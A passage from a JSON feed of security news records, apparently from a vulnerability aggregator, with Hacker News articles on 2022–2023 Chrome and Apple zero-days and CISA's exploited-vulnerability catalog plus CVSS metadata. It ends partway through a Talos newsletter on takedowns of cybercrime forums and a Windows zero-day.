[**CVE-2022-1364**](<https://thehackernews.com/2022/04/google-releases-urgent-chrome-update-to.html>) \\- Type confusion in V8\n * [**CVE-2022-2294**](<https://thehackernews.com/2022/07/update-google-chrome-browser-to-patch.html>) \\- Heap buffer overflow in WebRTC\n * [**CVE-2022-2856**](<https://thehackernews.com/2022/08/new-google-chrome-zero-day.html>) \\- Insufficient validation of untrusted input in Intents\n * [**CVE-2022-3075**](<https://thehackernews.com/2022/09/google-release-urgent-chrome-update-to.html>) \\- Insufficient data validation in Mojo\n\nUsers are recommended to upgrade to version 107.0.5304.87 for macOS and Linux and 107.0.5304.87/.88 for Windows to mitigate potential threats.\n\nUsers of Chromium-based browsers such as Microsoft Edge, Brave, Opera, and Vivaldi are also advised to apply the fixes as and when they become available.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.6, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 6.0}, "published": "2022-10-28T10:40:00", "type": "thn", "title": "Google Issues Urgent Chrome Update to Patch Actively Exploited Zero-Day Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-0609", "CVE-2022-1096", "CVE-2022-1364", "CVE-2022-2294", "CVE-2022-2856", "CVE-2022-3075", "CVE-2022-3723"], "modified": "2022-10-28T10:58:12", "id": "THN:222F7713CA968509F8C385BA29B0B6A5", "href": "https://thehackernews.com/2022/10/google-issues-urgent-chrome-update-to.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-11-26T04:08:15", "description": "[ ](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEikPLibtmTn8N2H14UEsCbQi0mXDkp7d4sxfUThlf9SHApnBVQaXlzTa5_Y_GROcH_HN9A8cDTE0iaRtCHiFqthOucxRIZyrjEzXxqkiX0DQPciOOULFnJ0I4aob50-m5id5elUHNKFtdF-5Ep-jdQVcYtFgUVENLsQkZIYWjXsuoDDYF_UBh0lc0o2/s728-e100/chrome-update.png>)\n\nGoogle on Thursday released software updates to address yet another zero-day flaw in its Chrome web browser.\n\nTracked as **CVE-2022-4135**, the high-severity vulnerability has been described as a heap buffer overflow in the GPU component. Clement Lecigne of Google's Threat Analysis Group (TAG) has been credited with reporting the flaw on November 22, 2022.\n\nHeap-based buffer overflow bugs can be [weaponized](<https://cwe.mitre.org/data/definitions/122.html>) by threat actors to crash a program or execute arbitrary code, leading to unintended behavior.\n\n\"Google is aware that an exploit for CVE-2022-4135 exists in the wild,\" the tech giant [acknowledged](<https://chromereleases.googleblog.com/2022/11/stable-channel-update-for-desktop_24.html>) in an advisory.\n\nBut like other actively exploited issues, technical specifics have been withheld until a majority of the users are updated with a fix and to prevent further abuse.\n\nWith the latest update, Google has resolved eight zero-day vulnerabilities in Chrome since the start of the year -\n\n * [**CVE-2022-0609**](<https://thehackernews.com/2022/02/new-chrome-0-day-bug-under-active.html>) \\- Use-after-free in Animation\n * [**CVE-2022-1096**](<https://thehackernews.com/2022/03/google-issues-urgent-chrome-update-to.html>) \\- Type confusion in V8\n * [**CVE-2022-1364**](<https://thehackernews.com/2022/04/google-releases-urgent-chrome-update-to.html>) \\- Type confusion in V8\n * [**CVE-2022-2294**](<https://thehackernews.com/2022/07/update-google-chrome-browser-to-patch.html>) \\- Heap buffer overflow in WebRTC\n * [**CVE-2022-2856**](<https://thehackernews.com/2022/08/new-google-chrome-zero-day.html>) \\- Insufficient validation of untrusted input in Intents\n * [**CVE-2022-3075**](<https://thehackernews.com/2022/09/google-release-urgent-chrome-update-to.html>) \\- Insufficient data validation in Mojo\n * [**CVE-2022-3723**](<https://thehackernews.com/2022/10/google-issues-urgent-chrome-update-to.html>) \\- Type confusion in V8\n\nUsers are recommended to upgrade to version 107.0.5304.121 for macOS and Linux and 107.0.5304.121/.122 for Windows to mitigate potential threats.\n\nUsers of Chromium-based browsers such as Microsoft Edge, Brave, Opera, and Vivaldi are also advised to apply the fixes as and when they become available.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.6, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 6.0}, "published": "2022-11-25T13:12:00", "type": "thn", "title": "Update Chrome Browser Now to Patch New Actively Exploited Zero-Day Flaw", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-0609", "CVE-2022-1096", "CVE-2022-1364", "CVE-2022-2294", "CVE-2022-2856", "CVE-2022-3075", "CVE-2022-3723", "CVE-2022-4135"], "modified": "2022-11-26T04:07:40", "id": "THN:FFFF05ECDE44C9ED26B53D328B60689B", "href": "https://thehackernews.com/2022/11/update-chrome-browser-now-to-patch-new.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-05T16:25:13", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjPIpWOjahlvRij54ICh2NyDdEkKI9koTk4lx8UXqPG1hBOVokLO1jZE7QvnnAHX4fw21sdwK34cVKndChvGxTI0QScuSjwYGvpLSpuK9FSFbuXtXzoaxwm6I78OZwM-uyBKf7_r18ShybiBxFrmBcIKJ7pAD2BPSMaEVwJzpBkK1kNSbrrtJ6AmkPk/s728-e100/chrome-update.jpg>)\n\nGoogle on Monday shipped security updates to address a high-severity zero-day vulnerability in its Chrome web browser that it said is being exploited in the wild.\n\nThe shortcoming, tracked as [**CVE-2022-2294**](<https://chromereleases.googleblog.com/2022/07/stable-channel-update-for-desktop.html>), relates to a heap overflow flaw in the [WebRTC](<https://en.wikipedia.org/wiki/WebRTC>) component that provides real-time audio and video communication capabilities in browsers without the need to install plugins or download native apps.\n\nHeap buffer overflows, also referred to as heap overrun or heap smashing, occur when data is overwritten in the [heap area of the memory](<https://en.wikipedia.org/wiki/Memory_management#Manual_memory_management>), leading to arbitrary code execution or a denial-of-service (DoS) condition.\n\n\"Heap-based overflows can be used to overwrite function pointers that may be living in memory, pointing it to the attacker's code,\" MITRE [explains](<https://cwe.mitre.org/data/definitions/122.html>). \"When the consequence is arbitrary code execution, this can often be used to subvert any other security service.\"\n\nCredited with reporting the flaw on July 1, 2022, is Jan Vojtesek from the Avast Threat Intelligence team. It's worth pointing out that the bug also [impacts](<https://chromereleases.googleblog.com/2022/07/chrome-for-android-update.html>) the Android version of Chrome.\n\nAs is usually the case with zero-day exploitation, details pertaining to the flaw as well as other specifics related to the campaign have been withheld to prevent further abuse in the wild and until a significant chunk of users are updated with a fix.\n\nCVE-2022-2294 also marks the resolution of the fourth zero-day vulnerability in Chrome since the start of the year -\n\n * [**CVE-2022-0609**](<https://thehackernews.com/2022/02/new-chrome-0-day-bug-under-active.html>) \\- Use-after-free in Animation\n * [**CVE-2022-1096**](<https://thehackernews.com/2022/03/google-issues-urgent-chrome-update-to.html>) \\- Type confusion in V8\n * [**CVE-2022-1364**](<https://thehackernews.com/2022/04/google-releases-urgent-chrome-update-to.html>) \\- Type confusion in V8\n\nUsers are recommended to update to version 103.0.5060.114 for Windows, macOS, and Linux and 103.0.5060.71 for Android to mitigate potential threats. Users of Chromium-based browsers such as Microsoft Edge, Brave, Opera, and Vivaldi are also advised to apply the fixes as and when they become available.\n\nThe disclosure shortly follows a report from Google Project Zero, which [noted](<https://googleprojectzero.blogspot.com/2022/06/2022-0-day-in-wild-exploitationso-far.html>) that a total of 18 security vulnerabilities have been exploited as unpatched zero-days in the wild so far this year.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-07-05T02:55:00", "type": "thn", "title": "Update Google Chrome Browser to Patch New Zero-Day Exploit Detected in the Wild", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-0609", "CVE-2022-1096", "CVE-2022-1364", "CVE-2022-2294"], "modified": "2022-07-05T13:54:52", "id": "THN:2E90A09BA23747C57B4B5C9ED7D13ED9", "href": "https://thehackernews.com/2022/07/update-google-chrome-browser-to-patch.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-20T04:20:39", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEhOfL8YkCmEWRL1H5ftHD1fx4A4jxsGJDAVf5omgkgPfSQyjRb8UkrvUfIv8qDwSUzf47MO8jkHCs0-QIFfKhOZTFYaIst08bRXhbdewNA4eUVRra24Zwc5gTnGf3z0BiN8vKyVM4SDkzgnoP8SwSsICSU9znwt8tuGFGTCOSqj2bq2dE3YQAH4Aajb/s728-e365/apple-patch.jpg>)\n\nApple on Thursday [rolled out security updates](<https://support.apple.com/en-us/HT201222>) to iOS, iPadOS, macOS, tvOS, watchOS, and the Safari web browser to address dozens of flaws, including three new zero-days that it said are being actively exploited in the wild.\n\nThe three security shortcomings are listed below -\n\n * **CVE-2023-32409** \\- A WebKit flaw that could be exploited by a malicious actor to break out of the Web Content sandbox. It was addressed with improved bounds checks.\n * **CVE-2023-28204** \\- An out-of-bounds read issue in WebKit that could be abused to disclose sensitive information when processing web content. It was addressed with improved input validation.\n * **CVE-2023-32373** \\- A use-after free bug in WebKit that could lead to arbitrary code execution when processing maliciously crafted web content. It was addressed with improved memory management.\n\nThe iPhone maker credited Cl\u00e9ment Lecigne of Google's Threat Analysis Group (TAG) and Donncha \u00d3 Cearbhaill of Amnesty International's Security Lab for reporting CVE-2023-32409. An anonymous researcher has been acknowledged for reporting the other two issues.\n\nIt's worth noting that both CVE-2023-28204 and CVE-2023-32373 were patched as part of [Rapid Security Response updates](<https://support.apple.com/en-us/HT201224>) \u2013 iOS 16.4.1 (a) and iPadOS 16.4.1 (a) \u2013 the company released at the start of the month.\n\nThere are currently no additional technical specifics about the flaws, the nature of the attacks, or the identity of the threat actors that may be exploiting them.\n\nThat said, such weaknesses have been historically leveraged as part of [highly-targeted](<https://thehackernews.com/2023/04/nso-group-used-3-zero-click-iphone.html>) [intrusions](<https://thehackernews.com/2023/05/bouldspy-android-spyware-iranian.html>) to deploy mercenary spyware on the devices of dissidents, journalists, and human rights activists, among others.\n\nThe latest updates are available for the following devices and operating systems -\n\n * **iOS 16.5 and iPadOS 16.5** \\- iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later\n * **iOS 15.7.6 and iPadOS 15.7.6** \\- iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Air 2, iPad mini (4th generation), and iPod touch (7th generation)\n * **macOS Ventura 13.4** \\- macOS Ventura\n * **tvOS 16.5** \\- Apple TV 4K (all models) and Apple TV HD\n * **watchOS 9.5** \\- Apple Watch Series 4 and later\n * **Safari 16.5** \\- macOS Big Sur and macOS Monterey\n\nApple has so far remediated a total of six actively exploited zero-days since the start of 2023. Earlier this February, the company plugged a WebKit flaw ([CVE-2023-23529](<https://thehackernews.com/2023/02/patch-now-apples-ios-ipados-macos-and.html>)) that could lead to remote code execution.\n\nThen last month, it shipped fixes for a pair of vulnerabilities ([CVE-2023-28205 and CVE-2023-28206](<https://thehackernews.com/2023/04/apple-releases-updates-to-address-zero.html>)) that allowed for code execution with elevated privileges. Lecigne and \u00d3 Cearbhaill were credited with reporting the security defects.\n\n \n\n\nFound this article interesting? Follow us on [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2023-05-19T03:43:00", "type": "thn", "title": "WebKit Under Attack: Apple Issues Emergency Patches for 3 New Zero-Day Vulnerabilities", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2023-23529", "CVE-2023-28204", "CVE-2023-28205", "CVE-2023-28206", "CVE-2023-32373", "CVE-2023-32409"], "modified": "2023-05-20T04:03:09", "id": "THN:8381F519DFF54C15EB87683549455A83", "href": "https://thehackernews.com/2023/05/webkit-under-attack-apple-issues.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-08-17T15:25:34", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEj3_bb3VbAiNI0HLVud2PvXV4VExBpknt5lLSc3IAtymjftt7sn5yG-gY7yWqZ7D13YpvQEhW_EH4K62wzm6dC_qDTQQokydIY0LHI2Ivvv6v5ShPJk8fOOoh0yQrASsDwCREknRK5SCrggAETbG4yY7w0t3uG53Dnpf3ckvBXKygsIpNHrnmHDrimR/s728-e100/chrome.png>)\n\nGoogle on Tuesday rolled out patches for Chrome browser for desktops to contain an actively exploited high-severity zero-day flaw in the wild.\n\nTracked as **CVE-2022-2856**, the issue has been described as a case of insufficient validation of untrusted input in [Intents](<https://www.chromium.org/developers/web-intents-in-chrome/>). Security researchers Ashley Shen and Christian Resell of Google Threat Analysis Group have been credited with reporting the flaw on July 19, 2022.\n\nAs is typically the case, the tech giant has refrained from sharing additional specifics about the shortcoming until a majority of the users are updated. \"Google is aware that an exploit for CVE-2022-2856 exists in the wild,\" it [acknowledged](<https://chromereleases.googleblog.com/2022/08/stable-channel-update-for-desktop_16.html>) in a terse statement.\n\nThe latest update further addresses 10 other security flaws, most of which relate to use-after-free bugs in various components such as FedCM, SwiftShader, ANGLE, and Blink, among others. Also fixed is a heap buffer overflow vulnerability in Downloads.\n\nThe development marks the fifth zero-day vulnerability in Chrome that Google has resolved since the start of the year -\n\n * [**CVE-2022-0609**](<https://thehackernews.com/2022/02/new-chrome-0-day-bug-under-active.html>) \\- Use-after-free in Animation\n * [**CVE-2022-1096**](<https://thehackernews.com/2022/03/google-issues-urgent-chrome-update-to.html>) \\- Type confusion in V8\n * [**CVE-2022-1364**](<https://thehackernews.com/2022/04/google-releases-urgent-chrome-update-to.html>) \\- Type confusion in V8\n * [**CVE-2022-2294**](<https://thehackernews.com/2022/07/update-google-chrome-browser-to-patch.html>) \\- Heap buffer overflow in WebRTC\n\nUsers are recommended to update to version 104.0.5112.101 for macOS and Linux and 104.0.5112.102/101 for Windows to mitigate potential threats. Users of Chromium-based browsers such as Microsoft Edge, Brave, Opera, and Vivaldi are also advised to apply the fixes as and when they become available.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-08-17T12:02:00", "type": "thn", "title": "New Google Chrome Zero-Day Vulnerability Being Exploited in the Wild", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-0609", "CVE-2022-1096", "CVE-2022-1364", "CVE-2022-2294", "CVE-2022-2856"], "modified": "2022-08-17T13:41:27", "id": "THN:EDC4E93542AFAF751E67BF527C826DA4", "href": "https://thehackernews.com/2022/08/new-google-chrome-zero-day.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-04-11T06:17:28", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEicw1SKpG1H9PmPf9gDuYYYi3gdQD3zFQo5j0z14zimEBBMe-b7Ey9uDqInHE1TovFVk5j-kpvYYMZQ6bG0fiZK0V69Z0gHGCe2PiqDwUu5rbJvdsyMCcquDVmtT68gnm_Wu_Fjw62Gb8jQgl9lOi2VAoWOJ8m63FHfZ-6aEIQ2Vx4V6jimGDtrvw_F/s728-e365/cisa.jpg>)\n\nThe U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Friday added [five security flaws](<https://www.cisa.gov/news-events/alerts/2023/04/07/cisa-adds-five-known-exploited-vulnerabilities-catalog>) to its Known Exploited Vulnerabilities ([KEV](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>)) catalog, citing evidence of active exploitation in the wild.\n\nThis includes three high-severity flaws in the Veritas Backup Exec Agent software (CVE-2021-27876, CVE-2021-27877, and CVE-2021-27878) that could lead to the execution of privileged commands on the underlying system. The flaws were [fixed](<https://www.veritas.com/support/en_US/security/VTS21-001>) in a patch released by Veritas in March 2021.\n\n * [**CVE-2021-27876**](<https://nvd.nist.gov/vuln/detail/CVE-2021-27876>) (CVSS score: 8.1) - Veritas Backup Exec Agent File Access Vulnerability\n * [**CVE-2021-27877**](<https://nvd.nist.gov/vuln/detail/CVE-2021-27877>) (CVSS score: 8.2) - Veritas Backup Exec Agent Improper Authentication Vulnerability\n * [**CVE-2021-27878**](<https://nvd.nist.gov/vuln/detail/CVE-2021-27878>) (CVSS score: 8.8) - Veritas Backup Exec Agent Command Execution Vulnerability\n\nGoogle-owned Mandiant, in a [report](<https://www.mandiant.com/resources/blog/alphv-ransomware-backup>) published last week, revealed that an affiliate associated with the [BlackCat](<https://thehackernews.com/2022/09/blackcat-ransomware-attackers-spotted.html>) (aka ALPHV and Noberus) ransomware operation is targeting publicly exposed Veritas Backup Exec installations to gain initial access by leveraging the aforementioned three bugs.\n\nThe threat intelligence firm, which is tracking the affiliate actor under its uncategorized moniker UNC4466, said it first observed exploitation of the flaws in the wild on October 22, 2022.\n\nIn one incident detailed by Mandiant, UNC4466 gained access to an internet-exposed Windows server, followed by carrying out a series of actions that allowed the attacker to deploy the Rust-based ransomware payload, but not before conducting reconnaissance, escalating privileges, and disabling Microsoft Defender's real-time monitoring capability.\n\nAlso added by CISA to the KEV catalog is [CVE-2019-1388](<https://nvd.nist.gov/vuln/detail/CVE-2019-1388>) (CVSS score: 7.8), a privilege escalation flaw impacting Microsoft Windows Certificate Dialog that could be exploited to run processes with elevated permissions on an already compromised host.\n\nThe fifth vulnerability included in the list is an information disclosure flaw in Arm Mali GPU Kernel Driver ([CVE-2023-26083](<https://nvd.nist.gov/vuln/detail/cve-2023-26083>)) that was [revealed](<https://thehackernews.com/2023/03/spyware-vendors-caught-exploiting-zero.html>) by Google's Threat Analysis Group (TAG) last month as abused by an unnamed spyware vendor as part of an exploit chain to break into Samsung's Android smartphones.\n\nFederal Civilian Executive Branch (FCEB) agencies have time till April 28, 2023, to apply the patches to secure their networks against potential threats.\n\nThe advisory also comes as Apple released updates for iOS, iPadOS, macOS, and Safari web browser to address a [pair of zero-day flaws](<https://thehackernews.com/2023/04/apple-releases-updates-to-address-zero.html>) (CVE-2023-28205 and CVE-2023-28206) that it said has been exploited in real-world attacks.\n\n### Update:\n\nCISA, on April 10, 2023, [added](<https://www.cisa.gov/news-events/alerts/2023/04/10/cisa-adds-two-known-exploited-vulnerabilities-catalog>) the two Apple zero-day vulnerabilities to the KEV catalog, urging FCEB agencies to secure iOS, iPadOS, and macOS devices by May 1, 2023.\n\n \n\n\nFound this article interesting? Follow us on [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-04-10T06:25:00", "type": "thn", "title": "CISA Warns of 5 Actively Exploited Security Flaws: Urgent Action Required", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-1388", "CVE-2021-27876", "CVE-2021-27877", "CVE-2021-27878", "CVE-2023-26083", "CVE-2023-28205", "CVE-2023-28206"], "modified": "2023-04-11T04:30:44", "id": "THN:ED17BB6E1286DD4E36EFE5877F25B545", "href": "https://thehackernews.com/2023/04/cisa-warns-of-5-actively-exploited.html", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "talosblog": [{"lastseen": "2023-05-09T19:58:11", "description": "\n\nWelcome to this week&#x27;s edition of the Threat Source newsletter.\n\nLaw enforcement organizations across the globe notched a series of wins over the past few weeks against online forums for cybercriminals.\n\nOn March 23, the FBI announced it [disrupted the online cybercriminal marketplace BreachForums](<https://www.justice.gov/opa/pr/justice-department-announces-arrest-founder-one-world-s-largest-hacker-forums-and-disruption>), known for being a place where users could buy and sell stolen user information. They also arrested a 20-year-old suspected of being the site&#x27;s founder and main administrator.\n\nThen last week we had [&quot;Operation Cookie Monster&quot;](<https://arstechnica.com/tech-policy/2023/04/operation-cookie-monster-feds-seize-notorious-hacker-marketplace/>) in which several international agencies worked together [to take down Genesis Market](<https://www.reuters.com/world/uk/operation-cookie-monster-international-police-action-seizes-dark-web-market-2023-04-05/>), a similar dark web forum, arresting dozens of suspected users and administrators.\n\nThese arrests and network operations are important in that they disrupted sites that were known for highly sensitive information and served as a place for some of the most prolific cyber criminals to make money. The U.S. Department of Justice estimated that Genesis Market was responsible for the sale of data on more than 1.5 million compromised computers around the world containing over 80 million account access credentials. And the U.K.&#x27;s National Crime Agency (NCA) said credentials were available for as little as 70 cents to hundreds of dollars depending on the stolen data available.\n\nBut the user base for these sites was also huge (after all, someone had to be buying those credentials). At the time of its takedown, BreachForums had 340,000 members, according to the FBI. And reporting on Operation Cookie Monster stated that Genesis Market had 59,000 registered users.\n\nSo while it&#x27;s great that these sites have been disrupted, I can&#x27;t help but assume that two more sites are going to pop up to service these cyber criminals. It&#x27;s impossible for any agency to arrest 340,000 people, so even if a handful of administrators are restricted from accessing the internet for a while, the other 339,000 people are going to be looking for a new home.\n\nSome of the same agencies celebrated in March 2021 that they[ disrupted Emotet](<https://www.justice.gov/opa/pr/emotet-botnet-disrupted-international-cyber-operation>), one of the most infamous botnets ever. As anyone who follows security news will know, Emotet didn&#x27;t actually go anywhere and was recently rebooted as recently as last month, [according to our research](<https://blog.talosintelligence.com/emotet-switches-to-onenote/>).\n\nRaidForums, a forefather of BreachForums, was [also disrupted in April 2022](<http://techtarget.com/searchsecurity/news/252515896/Law-enforcement-takedowns-continue-with-RaidForums-seizure>), along with the arrest of several administrators and accomplices.\n\nAll of this is not to discount the great strides made in the past few weeks in disrupting these marketplaces and taking them offline. But a lot of these headlines are sounding familiar to me after a few years, so it&#x27;s important to remember that we as a security community can&#x27;t take our foot off the gas and assume that because there were a few big wins that [dark web forums are just going to go away forever](<https://talostakes.talosintelligence.com/2018149/11127920>).\n\n## The one big thing\n\n[Microsoft&#x27;s Patch Tuesday](<https://blog.talosintelligence.com/microsoft-patch-tuesday-for-april-2023/>) for April included another zero-day vulnerability in the Windows Common Log File System Driver. [CVE-2023-28252](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2023-28252>), which could allow an attacker to obtain SYSTEM privileges, is actively being exploited in the wild, according to Microsoft. The U.S. Cybersecurity and Infrastructure Security Agency already added the vulnerability to its list of know exploited issues and urged federal agencies to patch it as soon as possible. Microsoft disclosed a similar zero-day issue in September that could also lead to the same privileges: CVE-2022-37969.\n\n### Why do I care?\n\nSecurity researchers say that the vulnerability has already been [exploited in Nokoyawa ransomware attacks](<https://www.bleepingcomputer.com/news/security/windows-zero-day-vulnerability-exploited-in-ransomware-attacks/>), so it&#x27;s important to patch this issue as soon as possible. The Nokoyawa ransomware is known for targeting 64-bit Windows systems in double extortion attacks in which the actors encrypt targets&#x27; files and then threaten to leak them unless the ransom is paid.\n\n### So now what?\n\nMicrosoft has a patch available, so all Windows users should update now if they haven&#x27;t already. Talos also has [new Snort detection coverage available](<https://snort.org/advisories/talos-rules-2023-04-11>) for CVE-2023-28252 and other vulnerabilities disclosed as part of Patch Tuesday.\n\n## Top security headlines of the week\n\n**A trove of classified military documents and images leaked on several social media channels** over the past week, including potentially sensitive information on Russia&#x27;s invasion of Ukraine and China&#x27;s military plans. The images first surfaced in a Discord channel, eventually making their way onto the Telegram messaging app, the popular forum 4Chan and then broader social media sites like Twitter. The U.S. Department of Justice and the Pentagon have since launched a formal investigation into the leaks. Ukrainian officials have blamed Russian actors for the leaks, trying to cast doubt on the authenticity of the images, while Russia accused Western governments of trying to spread disinformation. ([Bellingcat](<https://www.bellingcat.com/news/2023/04/09/from-discord-to-4chan-the-improbable-journey-of-a-us-defence-leak/>), [New York Times](<https://www.nytimes.com/2023/04/07/us/politics/classified-documents-leak.html>))\n\n**Apple released patches for two zero-day vulnerabilities** targeting current and older versions of iOS, iPadOS, macOS and Safari that attackers were exploiting in the wild. The vulnerabilities, CVE-2023-28206 and CVE-2023-28205, could lead to arbitrary code execution. CVE-2023-28206 specifically could allow an adversary 